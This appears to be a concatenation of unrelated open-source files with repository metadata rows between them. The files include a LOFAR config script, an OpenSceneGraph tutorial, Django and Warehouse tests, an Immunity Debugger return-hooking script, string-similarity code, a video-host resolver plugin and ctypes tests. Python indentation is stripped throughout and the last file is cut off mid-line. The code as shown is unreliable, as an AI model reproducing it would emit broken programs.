results = db.query(query).getresult()
for stationname in results:
station = stationname[0]
res = Popen(['./make_conf_files.py', station, target]).wait()
if (res != 0):
sys.exit(1)
res = Popen(['./make_all_station_file.py', target]).wait()
if (res != 0):
sys.exit(1)
db.close()
def make_one_conf_file():
print('Make one AntennaField.conf and iHBADeltas.conf file for given date')
station = get_input_with_default("Enter station ", "")
target = get_input_with_default("Enter target_date", default_targetdate)
res = Popen(['./make_conf_files.py', station, target]).wait()
if (res != 0):
sys.exit(1)
if __name__ == "__main__":
parser = OptionParser("Usage: %prog")
parser.add_option("-D", "--database",
dest="dbName",
type="string",
default=getDBname(),
help="Name of StationCoordinates database to use")
parser.add_option("-H", "--host",
dest="dbHost",
type="string",
default=getDBhost(),
help="Hostname of StationCoordinates database")
parser.add_option("-P", "--port",
dest="dbPort",
type="int",
default=getDBport(),
help="Port of StationCoordinates database")
parser.add_option("-U", "--user",
dest="dbUser",
type="string",
default=getDBuser(),
help="Username of StationCoordinates database")
# parse arguments
(options, args) = parser.parse_args()
dbName = options.dbName
dbHost = options.dbHost
dbPort = options.dbPort
dbUser = options.dbUser
dbPassword = None
while(1):
menu()
try:
input = raw_input # Python2 and Python3 compatible
except NameError:
pass
sel = input('Enter choice :')
if sel.upper() == 'Q':
sys.exit(1)
if sel == '1':
create_cdb()
if sel == '2':
create_cdb_objects()
if sel == '3':
load_normal_vectors()
if sel == '4':
load_rotation_matrices()
if sel == '5':
load_hba_rotations()
if sel == '6':
calculate_hba_deltas()
if sel == '7':
load_all_etrf()
if sel == '8':
load_measurement()
if sel == '9':
if dbPassword is None:
dbPassword = getpass.getpass("Database password:")
transform_all(dbHost, dbPort, dbName, dbUser, dbPassword)
if sel == '10':
transform_one()
if sel == '11':
if dbPassword is None:
dbPassword = getpass.getpass("Database password:")
make_all_conf_files(dbHost, dbPort, dbName, dbUser, dbPassword)
if sel == '12':
make_one_conf_file()
if sel == '0':
if dbPassword is None:
dbPassword = getpass.getpass("Database password:")
create_cdb()
create_cdb_objects()
load_normal_vectors()
load_rotation_matrices()
load_hba_rotations()
calculate_hba_deltas()
load_all_etrf()
transform_all(dbHost, dbPort, dbName, dbUser, dbPassword)
make_all_conf_files(dbHost, dbPort, dbName, dbUser, dbPassword)
| gpl-3.0 | -5,528,725,688,728,908,000 | 33.464286 | 99 | 0.557419 | false |
JaneliaSciComp/osgpyplusplus | examples/osg-tutorial/tut2_textures.py | 1 | 6318 | #!/bin/env python
# Translated into python from C++ tutorial at
# http:#trac.openscenegraph.org/projects/osg/wiki/Support/Tutorials/Textures
from osgpypp import osg, osgDB, osgViewer
import sys
# Creating Textured Geometry using StateSets
# Goals
# Add a texture to geometry defined by OpenGL drawing primitives introduced in
# tutorial Basic geometry.
# Background
# The previous tutorial introduced viewing scenes that include basic shapes
# created from OpenGL primitives. This section explains how to add textures to
# these shapes. To make the code easier to use, we'll put the pyramid code
# into a function that creates a geode and returns a pointer to it. The
# following code is from tutorial Basic geometry.
def createPyramid():
pyramidGeode = osg.Geode()
pyramidGeometry = osg.Geometry()
pyramidGeode.addDrawable(pyramidGeometry)
# Specify the vertices:
pyramidVertices = osg.Vec3Array()
pyramidVertices.append( osg.Vec3(0, 0, 0) ) # front left
pyramidVertices.append( osg.Vec3(2, 0, 0) ) # front right
pyramidVertices.append( osg.Vec3(2, 2, 0) ) # back right
pyramidVertices.append( osg.Vec3( 0,2, 0) ) # back left
pyramidVertices.append( osg.Vec3( 1, 1,2) ) # peak
# Associate this set of vertices with the geometry associated with the
# geode we added to the scene.
pyramidGeometry.setVertexArray( pyramidVertices )
# Create a QUAD primitive for the base by specifying the
# vertices from our vertex list that make up this QUAD:
pyramidBase = osg.DrawElementsUInt(osg.PrimitiveSet.QUADS, 0)
pyramidBase.append(3)
pyramidBase.append(2)
pyramidBase.append(1)
pyramidBase.append(0)
# Add this primitive to the geometry:
# pyramidGeometry.addPrimitiveSet(pyramidBase)
# code to create other faces goes here!
pyramidGeometry.addPrimitiveSet(pyramidBase)
# Repeat the same for each of the four sides. Again, vertices are specified in counter-clockwise order.
pyramidFaceOne = osg.DrawElementsUInt(osg.PrimitiveSet.TRIANGLES, 0)
pyramidFaceOne.append(0)
pyramidFaceOne.append(1)
pyramidFaceOne.append(4)
pyramidGeometry.addPrimitiveSet(pyramidFaceOne)
pyramidFaceTwo = osg.DrawElementsUInt(osg.PrimitiveSet.TRIANGLES, 0)
pyramidFaceTwo.append(1)
pyramidFaceTwo.append(2)
pyramidFaceTwo.append(4)
pyramidGeometry.addPrimitiveSet(pyramidFaceTwo)
pyramidFaceThree = osg.DrawElementsUInt(osg.PrimitiveSet.TRIANGLES, 0)
pyramidFaceThree.append(2)
pyramidFaceThree.append(3)
pyramidFaceThree.append(4)
pyramidGeometry.addPrimitiveSet(pyramidFaceThree)
pyramidFaceFour = osg.DrawElementsUInt(osg.PrimitiveSet.TRIANGLES, 0)
pyramidFaceFour.append(3)
pyramidFaceFour.append(0)
pyramidFaceFour.append(4)
pyramidGeometry.addPrimitiveSet(pyramidFaceFour)
colors = osg.Vec4Array()
colors.append(osg.Vec4(1.0, 0.0, 0.0, 1.0) ) #index 0 red
colors.append(osg.Vec4(0.0, 1.0, 0.0, 1.0) ) #index 1 green
colors.append(osg.Vec4(0.0, 0.0, 1.0, 1.0) ) #index 2 blue
colors.append(osg.Vec4(1.0, 1.0, 1.0, 1.0) ) #index 3 white
colors.append(osg.Vec4(1.0, 0.0, 0.0, 1.0) ) #index 4 red
pyramidGeometry.setColorArray(colors)
pyramidGeometry.setColorBinding(osg.Geometry.BIND_PER_VERTEX)
# Since the mapping from vertices to texture coordinates is 1:1,
# we don't need to use an index array to map vertices to texture
# coordinates. We can do it directly with the 'setTexCoordArray'
# method of the Geometry class.
# This method takes a variable that is an array of two dimensional
# vectors (osg.Vec2). This variable needs to have the same
# number of elements as our Geometry has vertices. Each array element
# defines the texture coordinate for the cooresponding vertex in the
# vertex array.
texcoords = osg.Vec2Array(5)
texcoords[0].set(0.00,0.0) # tex coord for vertex 0
texcoords[1].set(0.25,0.0) # tex coord for vertex 1
texcoords[2].set(0.50,0.0) # ""
texcoords[3].set(0.75,0.0) # ""
texcoords[4].set(0.50,1.0) # ""
pyramidGeometry.setTexCoordArray(0,texcoords)
return pyramidGeode
# Loading a Texture, Creating a State Set, assigning it to a Node
# The method for rendering primitives is controlled using StateSets. This
# section of code demonstrates how to load a texture from file, create a
# StateSet in which this texture is enabled, and assign this StateSet to a
# node in the scene. The first section starts out the same as previous
# tutorials. Initialize a viewer and build a scene with a single pyramid.
# Declare a group to act as root node of a scene:
root = osg.Group()
pyramidGeode = createPyramid()
root.addChild(pyramidGeode)
# Now for adding a texture. Here we'll declare a texture instance and set
# its data variance as 'DYNAMIC'. (If we don't declare the texture as dynamic,
# some of the osg's optimization routines could remove it.) The texture class
# encapsulates OpenGL texture modes (wrap, filiter, etc.) as well as an
# osg.Image. The code below shows how to read an osg.Image instance from a
# file and associate this image with a texture.
KLN89FaceTexture = osg.Texture2D()
# protect from being optimized away as static state:
KLN89FaceTexture.setDataVariance(osg.Object.DYNAMIC)
# load an image by reading a file:
klnFace = osgDB.readImageFile("KLN89FaceB.tga")
if klnFace is None:
print " Couldn't find texture, quitting."
sys.exit(-1)
# Assign the texture to the image we read from file:
KLN89FaceTexture.setImage(klnFace)
# Textures can be associated with rendering StateSets. The next step is to
# create a StateSet, associate and enable our texture with this state set and
# assign the StateSet to our geometry.
# Create a StateSet with default settings:
stateOne = osg.StateSet()
# Assign texture unit 0 of our StateSet to the texture
# we just created and enable the texture.
stateOne.setTextureAttributeAndModes(0, KLN89FaceTexture, osg.StateAttribute.ON)
# Associate this state set with the Geode that contains
# the pyramid:
pyramidGeode.setStateSet(stateOne)
# The last step is the simulation loop:
viewer = osgViewer.Viewer()
#The final step is to set up and enter a simulation loop.
viewer.setSceneData( root )
viewer.run()
| bsd-3-clause | 5,011,954,014,060,613,000 | 38.242236 | 108 | 0.738841 | false |
alex/warehouse | tests/unit/test_filters.py | 1 | 7152 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import urllib.parse
import jinja2
import packaging.version
import pretend
import pytest
import readme_renderer.rst
from warehouse import filters
def test_camo_url():
c_url = filters._camo_url(
"https://camo.example.net/",
"fake key",
"http://example.com/image.jpg",
)
assert c_url == (
"https://camo.example.net/b410d235a3d2fc44b50ccab827e531dece213062/"
"687474703a2f2f6578616d706c652e636f6d2f696d6167652e6a7067"
)
class TestReadmeRender:
def test_can_render(self, monkeypatch):
monkeypatch.setattr(
readme_renderer.rst,
"render",
lambda raw: "rendered",
)
ctx = {
"request": pretend.stub(
registry=pretend.stub(
settings={
"camo.url": "https://camo.example.net/",
"camo.key": "fake key",
},
),
),
}
result = filters.readme(ctx, "raw thing", format="rst")
assert result == jinja2.Markup("rendered")
def test_cant_render(self, monkeypatch):
monkeypatch.setattr(readme_renderer.rst, "render", lambda raw: None)
monkeypatch.setattr(
readme_renderer.txt, "render", lambda raw: "rendered<br>thing",
)
ctx = {
"request": pretend.stub(
registry=pretend.stub(
settings={
"camo.url": "https://camo.example.net/",
"camo.key": "fake key",
},
),
),
}
result = filters.readme(ctx, "raw thing", format="rst")
assert result == jinja2.Markup("rendered<br>thing")
def test_renders_camo(self, monkeypatch):
html = "<img src=http://example.com/image.jpg>"
monkeypatch.setattr(readme_renderer.rst, "render", lambda raw: html)
gen_camo_url = pretend.call_recorder(
lambda curl, ckey, url: "https://camo.example.net/image.jpg"
)
monkeypatch.setattr(filters, "_camo_url", gen_camo_url)
ctx = {
"request": pretend.stub(
registry=pretend.stub(
settings={
"camo.url": "https://camo.example.net/",
"camo.key": "fake key",
},
),
),
}
result = filters.readme(ctx, "raw thing", format="rst")
assert result == jinja2.Markup(
'<img src="https://camo.example.net/image.jpg">'
)
assert gen_camo_url.calls == [
pretend.call(
"https://camo.example.net/",
"fake key",
"http://example.com/image.jpg",
),
]
def test_renders_camo_no_src(self, monkeypatch):
html = "<img>"
monkeypatch.setattr(readme_renderer.rst, "render", lambda raw: html)
gen_camo_url = pretend.call_recorder(
lambda curl, ckey, url: "https://camo.example.net/image.jpg"
)
monkeypatch.setattr(filters, "_camo_url", gen_camo_url)
ctx = {
"request": pretend.stub(
registry=pretend.stub(
settings={
"camo.url": "https://camo.example.net/",
"camo.key": "fake key",
},
),
),
}
result = filters.readme(ctx, "raw thing", format="rst")
assert result == jinja2.Markup("<img>")
assert gen_camo_url.calls == []
@pytest.mark.parametrize(
("inp", "expected"),
[
(1, "1"),
(999, "999"),
(1234, "1.23k"),
(4304264, "4.3M"),
(7878123132, "7.88G"),
(9999999999999, "10T"),
],
)
def test_shorten_number(inp, expected):
assert filters.shorten_number(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
({"foo": "bar", "left": "right"}, '{"foo":"bar","left":"right"}'),
],
)
def test_tojson(inp, expected):
assert filters.tojson(inp) == expected
def test_urlparse():
inp = "https://google.com/foo/bar?a=b"
expected = urllib.parse.urlparse(inp)
assert filters.urlparse(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
(
"'python', finance, \"data\", code , test automation",
["python", "finance", "data", "code", "test automation"]
),
(
"'python'; finance; \"data\"; code ; test automation",
["python", "finance", "data", "code", "test automation"]
),
(
"a \"b\" c d 'e'",
["a", "b", "c", "d", "e"]
),
(
" ' ' \" \"",
[]
)
]
)
def test_format_tags(inp, expected):
assert filters.format_tags(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
(
["Foo :: Bar :: Baz", "Foo :: Bar :: Qux", "Vleep"],
[("Foo", ["Bar :: Baz", "Bar :: Qux"])],
),
(
["Vleep :: Foo", "Foo :: Bar :: Qux", "Foo :: Bar :: Baz"],
[("Foo", ["Bar :: Baz", "Bar :: Qux"]), ("Vleep", ["Foo"])],
),
],
)
def test_format_classifiers(inp, expected):
assert list(filters.format_classifiers(inp).items()) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
(
["abcdef", "ghijkl"],
False
),
(
["https://github.com/example/test", "https://pypi.io/"],
True
),
(
["abcdef", "https://github.com/example/test"],
True
)
]
)
def test_contains_valid_uris(inp, expected):
assert filters.contains_valid_uris(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
("bdist_dmg", "OSX Disk Image"),
("bdist_dumb", "Dumb Binary"),
("bdist_egg", "Egg"),
("bdist_msi", "Windows MSI Installer"),
("bdist_rpm", "RPM"),
("bdist_wheel", "Wheel"),
("bdist_wininst", "Windows Installer"),
("sdist", "Source"),
("invalid", "invalid"),
],
)
def test_format_package_type(inp, expected):
assert filters.format_package_type(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
("1.0", packaging.version.Version("1.0")),
]
)
def test_parse_version(inp, expected):
assert filters.parse_version(inp) == expected
| apache-2.0 | 4,395,946,780,134,338,600 | 26.6139 | 76 | 0.50755 | false |
mixman/djangodev | tests/regressiontests/localflavor/ca/tests.py | 1 | 3819 | import warnings
from django.contrib.localflavor.ca.forms import (CAPostalCodeField,
CAPhoneNumberField, CAProvinceField, CAProvinceSelect,
CASocialInsuranceNumberField)
from django.test import SimpleTestCase
class CALocalFlavorTests(SimpleTestCase):
def setUp(self):
self.save_warnings_state()
warnings.filterwarnings(
"ignore",
category=RuntimeWarning,
module='django.contrib.localflavor.ca.ca_provinces'
)
def tearDown(self):
self.restore_warnings_state()
def test_CAProvinceSelect(self):
f = CAProvinceSelect()
out = u'''<select name="province">
<option value="AB" selected="selected">Alberta</option>
<option value="BC">British Columbia</option>
<option value="MB">Manitoba</option>
<option value="NB">New Brunswick</option>
<option value="NL">Newfoundland and Labrador</option>
<option value="NT">Northwest Territories</option>
<option value="NS">Nova Scotia</option>
<option value="NU">Nunavut</option>
<option value="ON">Ontario</option>
<option value="PE">Prince Edward Island</option>
<option value="QC">Quebec</option>
<option value="SK">Saskatchewan</option>
<option value="YT">Yukon</option>
</select>'''
self.assertEqual(f.render('province', 'AB'), out)
def test_CAPostalCodeField(self):
error_format = [u'Enter a postal code in the format XXX XXX.']
valid = {
'T2S 2H7': 'T2S 2H7',
'T2S 2W7': 'T2S 2W7',
'T2S 2Z7': 'T2S 2Z7',
'T2Z 2H7': 'T2Z 2H7',
'T2S2H7' : 'T2S 2H7',
't2s 2h7': 'T2S 2H7',
't2s2h7' : 'T2S 2H7',
't2s 2H7': 'T2S 2H7',
' t2s 2H7 ': 'T2S 2H7',
}
invalid = {
'T2S 2H' : error_format,
'2T6 H8I': error_format,
'T2S2H' : error_format,
't2s h8i': error_format,
90210 : error_format,
'W2S 2H3': error_format,
'Z2S 2H3': error_format,
'F2S 2H3': error_format,
'A2S 2D3': error_format,
'A2I 2R3': error_format,
'A2Q 2R3': error_format,
'U2B 2R3': error_format,
'O2B 2R3': error_format,
}
self.assertFieldOutput(CAPostalCodeField, valid, invalid)
def test_CAPhoneNumberField(self):
error_format = [u'Phone numbers must be in XXX-XXX-XXXX format.']
valid = {
'403-555-1212': '403-555-1212',
'4035551212': '403-555-1212',
'403 555-1212': '403-555-1212',
'(403) 555-1212': '403-555-1212',
'403 555 1212': '403-555-1212',
'403.555.1212': '403-555-1212',
'403.555-1212': '403-555-1212',
' (403) 555.1212 ': '403-555-1212',
}
invalid = {
'555-1212': error_format,
'403-55-1212': error_format,
}
self.assertFieldOutput(CAPhoneNumberField, valid, invalid)
def test_CAProvinceField(self):
error_format = [u'Enter a Canadian province or territory.']
valid = {
'ab': 'AB',
'BC': 'BC',
'nova scotia': 'NS',
' manitoba ': 'MB',
}
invalid = {
'T2S 2H7': error_format,
}
self.assertFieldOutput(CAProvinceField, valid, invalid)
def test_CASocialInsuranceField(self):
error_format = [u'Enter a valid Canadian Social Insurance number in XXX-XXX-XXX format.']
valid = {
'046-454-286': '046-454-286',
}
invalid = {
'046-454-287': error_format,
'046 454 286': error_format,
'046-44-286': error_format,
}
self.assertFieldOutput(CASocialInsuranceNumberField, valid, invalid)
| bsd-3-clause | -1,082,681,703,602,119,000 | 33.098214 | 97 | 0.558785 | false |
sbobovyc/GameTools | ImmunityDebugger/collectLoopRets.py | 1 | 2256 | #!/usr/bin/env python
import immlib
from immlib import LogBpHook, BpHook
class ReturnBP(BpHook):
def __init__(self):
BpHook.__init__(self)
def run(self, regs):
imm = immlib.Debugger()
eip = regs["EIP"]
imm.log("bp, EIP is 0x%08X " % eip)
imm.addKnowledge("0x%08X" % eip, eip)
#self.UnHook()
imm.deleteBreakpoint(eip, eip+4)
imm.run()
class ReturnLog(LogBpHook):
def __init__(self):
LogBpHook.__init__(self)
def run(self, regs):
imm = immlib.Debugger()
eip = regs["EIP"]
imm.log("log, EIP is 0x%08X " % eip)
imm.addKnowledge("0x%08X" % eip, eip)
self.UnHook()
imm.deleteBreakpoint(eip, eip+4)
def main(args):
imm = immlib.Debugger()
module = imm.getModule(imm.getDebuggedName())
imm.log("module %s at 0x%08X" % (module.getName(), module.getBase()))
use_log_bp = True
if len(args) > 0 and args[0] == "false":
imm.log("Using non logging bp")
use_log_bp = False
# make sure module is analysed
if not module.isAnalysed():
module.Analyse()
knowledge = imm.listKnowledge()
hooked = 0
not_hooked = 0
for f in imm.getAllFunctions(module.getBase()):
for ret in imm.getFunctionEnd(f):
if "0x%08X" % ret not in knowledge:
#imm.log("function 0x%08X ret at 0x%08X" % (f, ret))
if use_log_bp:
hook = ReturnLog()
hook.add("ReturnLog 0x%08X"%f, ret)
hooked +=1
else:
hook = ReturnBP()
hook.add("ReturnBP 0x%08X"%f, ret)
hooked +=1
# i think fasthook because fast hook is over writing rets, getFunctionEnd is having trouble
#fast = immlib.FastLogHook(imm)
#fast.logFunction(ret)
#fast.logRegister("EIP")
#fast.Hook()
else:
not_hooked += 1
imm.log("Hooked %i, skipped %i" % (hooked, not_hooked))
return "Found returns, attached hooks"
| gpl-3.0 | 2,774,366,314,029,570,600 | 29.90411 | 107 | 0.503103 | false |
anhaidgroup/py_stringmatching | py_stringmatching/similarity_measure/jaro.py | 1 | 2435 | from py_stringmatching import utils
from six.moves import xrange
from py_stringmatching.similarity_measure.sequence_similarity_measure import \
SequenceSimilarityMeasure
from py_stringmatching.similarity_measure.cython.cython_jaro import jaro
class Jaro(SequenceSimilarityMeasure):
"""Computes Jaro measure.
The Jaro measure is a type of edit distance, developed mainly to compare short strings,
such as first and last names.
"""
def __init__(self):
super(Jaro, self).__init__()
def get_raw_score(self, string1, string2):
"""Computes the raw Jaro score between two strings.
Args:
string1,string2 (str): Input strings.
Returns:
Jaro similarity score (float).
Raises:
TypeError : If the inputs are not strings or if one of the inputs is None.
Examples:
>>> jaro = Jaro()
>>> jaro.get_raw_score('MARTHA', 'MARHTA')
0.9444444444444445
>>> jaro.get_raw_score('DWAYNE', 'DUANE')
0.8222222222222223
>>> jaro.get_raw_score('DIXON', 'DICKSONX')
0.7666666666666666
"""
# input validations
utils.sim_check_for_none(string1, string2)
# convert input to unicode.
string1 = utils.convert_to_unicode(string1)
string2 = utils.convert_to_unicode(string2)
utils.tok_check_for_string_input(string1, string2)
# if one of the strings is empty return 0
if utils.sim_check_for_empty(string1, string2):
return 0
return jaro(string1, string2)
def get_sim_score(self, string1, string2):
"""Computes the normalized Jaro similarity score between two strings. Simply call get_raw_score.
Args:
string1,string2 (str): Input strings.
Returns:
Normalized Jaro similarity score (float).
Raises:
TypeError : If the inputs are not strings or if one of the inputs is None.
Examples:
>>> jaro = Jaro()
>>> jaro.get_sim_score('MARTHA', 'MARHTA')
0.9444444444444445
>>> jaro.get_sim_score('DWAYNE', 'DUANE')
0.8222222222222223
>>> jaro.get_sim_score('DIXON', 'DICKSONX')
0.7666666666666666
"""
return self.get_raw_score(string1, string2)
| bsd-3-clause | -4,056,580,345,706,609,700 | 30.217949 | 104 | 0.593018 | false |
JeanOlivier/pyHegel | pyHegel/__init__.py | 1 | 2890 | # -*- coding: utf-8 -*-
########################## Copyrights and license ############################
# #
# Copyright 2011-2015 Christian Lupien <[email protected]> #
# #
# This file is part of pyHegel. http://github.com/lupien/pyHegel #
# #
# pyHegel is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the #
# Free Software Foundation, either version 3 of the License, or (at your #
# option) any later version. #
# #
# pyHegel is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public #
# License for more details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with pyHegel. If not, see <http://www.gnu.org/licenses/>. #
# #
##############################################################################
from __future__ import absolute_import
# Use version according to option 5 in https://packaging.python.org/en/latest/single_source_version.html
# make sure that new versions numbers compare properly when using
# pkg_resources.parse_version
__version__ = '1.0.0rc2'
__copyright__ = '2011-2015 Christian Lupien'
def start_pyHegel():
""" This is the recommanded way to start pyHegel.
It starts ipython in a standard way (pylab, autocall enabled,...)
and then loads and initializes the pyHegel commands.
If the python session was started with command line arguments
--console, it will try to start pyHegel in the Console program
that comes with pythonxy. This is windows only.
If you later need access to the commands in a module:
import pyHegel.commands as cmds
cmds.get(somedevice)
or
from pyHegel.commands import *
get(somedevice)
or any other variants you want.
"""
import sys
import os
if os.name == 'nt' and len(sys.argv) == 2 and sys.argv[1] == '--console':
start_console()
else:
from . import main
main.main_start()
def start_console():
from . import win_console_helper
win_console_helper.start_console()
| gpl-3.0 | 6,260,107,342,247,178,000 | 47.166667 | 104 | 0.510035 | false |
dknlght/dkodi | src/script.module.urlresolver/lib/urlresolver/plugins/vevio.py | 1 | 2891 | """
Plugin for UrlResolver
Copyright (C) 2018 jsergio
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from six.moves import urllib_error
import json
from urlresolver.plugins.lib import helpers
from urlresolver import common
from urlresolver.common import i18n
from urlresolver.resolver import UrlResolver, ResolverError
class VevIoResolver(UrlResolver):
name = "vevio"
domains = ["vev.io", "vev.red"]
pattern = r'(?://|\.)(vev\.(?:io|red))/(?:embed/)?([0-9a-zA-Z]+)'
def __init__(self):
self.headers = {'User-Agent': common.SMU_USER_AGENT}
def get_media_url(self, host, media_id):
try:
result = self.__check_auth(media_id)
if not result:
result = self.__auth_ip(media_id)
except ResolverError:
raise
if result:
return helpers.pick_source(helpers.sort_sources_list(result)) + helpers.append_headers(self.headers)
raise ResolverError("Unable to retrieve video")
def __auth_ip(self, media_id):
header = i18n('vevio_auth_header')
line1 = i18n('auth_required')
line2 = i18n('visit_link')
line3 = i18n('click_pair') % 'https://vev.io/pair'
with common.kodi.CountdownDialog(header, line1, line2, line3) as cd:
return cd.start(self.__check_auth, [media_id])
def __check_auth(self, media_id):
common.logger.log('Checking Auth: %s' % media_id)
url = self.get_url(media_id)
try:
js_result = json.loads(self.net.http_GET(url, headers=self.headers).content)
except ValueError:
raise ResolverError('Unusable Authorization Response')
except urllib_error.HTTPError as e:
if e.code == 400 or e.code == 401:
js_result = {}
else:
raise
common.logger.log('Auth Result: %s' % js_result)
if js_result.get('qualities', {}):
return [(qual.get('size')[1], qual.get('src')) for qual in js_result.get('qualities')]
else:
return []
def get_url(self, media_id, host='vev.io'):
return self._default_get_url(host, media_id, template='https://{host}/api/pair/{media_id}')
@classmethod
def isPopup(self):
return True
| gpl-2.0 | -3,188,007,391,110,179,000 | 35.1375 | 112 | 0.628156 | false |
DMS-Aus/Roam | src/roam/utils.py | 1 | 3007 | import faulthandler
import time
import logging
import os
import sys
import getpass
from logging import handlers
from qgis.PyQt import uic
import gdal
logger = logging.getLogger("roam")
log = logger.debug
debug = logger.debug
info = logger.info
warning = logger.warning
error = logger.error
critical = logger.critical
exception = logger.exception
def setup_logging(approot, config=None):
"""
Setup the roam logger relative to the given approot folder.
:param approot: The folder to create the log folder in.
"""
if config is None:
config = {"loglevel": "INFO"}
try:
logpath = os.path.join(os.environ['ROAM_APPPATH'], 'log')
except KeyError:
logpath = os.path.join(approot, 'log')
print("Logging into: {}".format(logpath))
if not os.path.exists(logpath):
os.makedirs(logpath)
LOG_FILENAME = os.path.join(logpath, "{}_roam.log".format(getpass.getuser()))
log_format = '%(levelname)s - %(asctime)s - %(module)s-%(funcName)s:%(lineno)d - %(message)s'
console_format = '%(levelname)s %(module)s-%(funcName)s:%(lineno)d - %(message)s'
formater = logging.Formatter(log_format)
console_formater = logging.Formatter(console_format)
filehandler = handlers.RotatingFileHandler(LOG_FILENAME,
mode='at',
maxBytes=1000000,
backupCount=5)
levelname = config.get("loglevel", "INFO")
level = logging.getLevelName(levelname)
filehandler.setLevel(level)
filehandler.setFormatter(formater)
stream = logging.StreamHandler(stream=sys.stdout)
stream.setLevel(logging.DEBUG)
stream.setFormatter(console_formater)
logger.handlers = []
logger.addHandler(stream)
logger.addHandler(filehandler)
logger.setLevel(logging.DEBUG)
uic.uiparser.logger.setLevel(logging.INFO)
uic.properties.logger.setLevel(logging.INFO)
if levelname == "DEBUG":
gdal.SetConfigOption("CPL_LOG", os.path.join(logpath, "gdallog.log"))
gdal.SetConfigOption("CPL_DEBUG", "ON")
else:
gdal.SetConfigOption("CPL_LOG", "")
gdal.SetConfigOption("CPL_DEBUG", "OFF")
faulthandler.enable(file=open(os.path.join(logpath, "crashlog.log"), 'w'))
class Timer():
def __init__(self, message="", logging=log):
self.message = message
self.logging = logging
def __enter__(self):
self.start = time.time()
def __exit__(self, *args):
message = self.message + " " + str(time.time() - self.start)
self.logging(message)
def timeit(method):
def wrapper(*args, **kwargs):
ts = time.time()
result = method(*args, **kwargs)
th = time.time()
message = "%r %2.2f seconds " % (method.__name__, th - ts)
info(message)
return result
return wrapper
def _pluralstring(text='', num=0):
return "%d %s%s" % (num, text, "s"[num == 1:])
| gpl-2.0 | -3,913,994,386,383,318,500 | 27.638095 | 97 | 0.621882 | false |
Jeff-Tian/mybnb | Python27/Lib/ctypes/test/test_byteswap.py | 2 | 11120 | import sys, unittest, struct, math, ctypes
from binascii import hexlify
from ctypes import *
def bin(s):
return hexlify(memoryview(s)).upper()
# Each *simple* type that supports different byte orders has an
# __ctype_be__ attribute that specifies the same type in BIG ENDIAN
# byte order, and a __ctype_le__ attribute that is the same type in
# LITTLE ENDIAN byte order.
#
# For Structures and Unions, these types are created on demand.
class Test(unittest.TestCase):
@unittest.skip('test disabled')
def test_X(self):
print >> sys.stderr, sys.byteorder
for i in range(32):
bits = BITS()
setattr(bits, "i%s" % i, 1)
dump(bits)
def test_endian_short(self):
if sys.byteorder == "little":
self.assertIs(c_short.__ctype_le__, c_short)
self.assertIs(c_short.__ctype_be__.__ctype_le__, c_short)
else:
self.assertIs(c_short.__ctype_be__, c_short)
self.assertIs(c_short.__ctype_le__.__ctype_be__, c_short)
s = c_short.__ctype_be__(0x1234)
self.assertEqual(bin(struct.pack(">h", 0x1234)), "1234")
self.assertEqual(bin(s), "1234")
self.assertEqual(s.value, 0x1234)
s = c_short.__ctype_le__(0x1234)
self.assertEqual(bin(struct.pack("<h", 0x1234)), "3412")
self.assertEqual(bin(s), "3412")
self.assertEqual(s.value, 0x1234)
s = c_ushort.__ctype_be__(0x1234)
self.assertEqual(bin(struct.pack(">h", 0x1234)), "1234")
self.assertEqual(bin(s), "1234")
self.assertEqual(s.value, 0x1234)
s = c_ushort.__ctype_le__(0x1234)
self.assertEqual(bin(struct.pack("<h", 0x1234)), "3412")
self.assertEqual(bin(s), "3412")
self.assertEqual(s.value, 0x1234)
def test_endian_int(self):
if sys.byteorder == "little":
self.assertIs(c_int.__ctype_le__, c_int)
self.assertIs(c_int.__ctype_be__.__ctype_le__, c_int)
else:
self.assertIs(c_int.__ctype_be__, c_int)
self.assertIs(c_int.__ctype_le__.__ctype_be__, c_int)
s = c_int.__ctype_be__(0x12345678)
self.assertEqual(bin(struct.pack(">i", 0x12345678)), "12345678")
self.assertEqual(bin(s), "12345678")
self.assertEqual(s.value, 0x12345678)
s = c_int.__ctype_le__(0x12345678)
self.assertEqual(bin(struct.pack("<i", 0x12345678)), "78563412")
self.assertEqual(bin(s), "78563412")
self.assertEqual(s.value, 0x12345678)
s = c_uint.__ctype_be__(0x12345678)
self.assertEqual(bin(struct.pack(">I", 0x12345678)), "12345678")
self.assertEqual(bin(s), "12345678")
self.assertEqual(s.value, 0x12345678)
s = c_uint.__ctype_le__(0x12345678)
self.assertEqual(bin(struct.pack("<I", 0x12345678)), "78563412")
self.assertEqual(bin(s), "78563412")
self.assertEqual(s.value, 0x12345678)
def test_endian_longlong(self):
if sys.byteorder == "little":
self.assertIs(c_longlong.__ctype_le__, c_longlong)
self.assertIs(c_longlong.__ctype_be__.__ctype_le__, c_longlong)
else:
self.assertIs(c_longlong.__ctype_be__, c_longlong)
self.assertIs(c_longlong.__ctype_le__.__ctype_be__, c_longlong)
s = c_longlong.__ctype_be__(0x1234567890ABCDEF)
self.assertEqual(bin(struct.pack(">q", 0x1234567890ABCDEF)), "1234567890ABCDEF")
self.assertEqual(bin(s), "1234567890ABCDEF")
self.assertEqual(s.value, 0x1234567890ABCDEF)
s = c_longlong.__ctype_le__(0x1234567890ABCDEF)
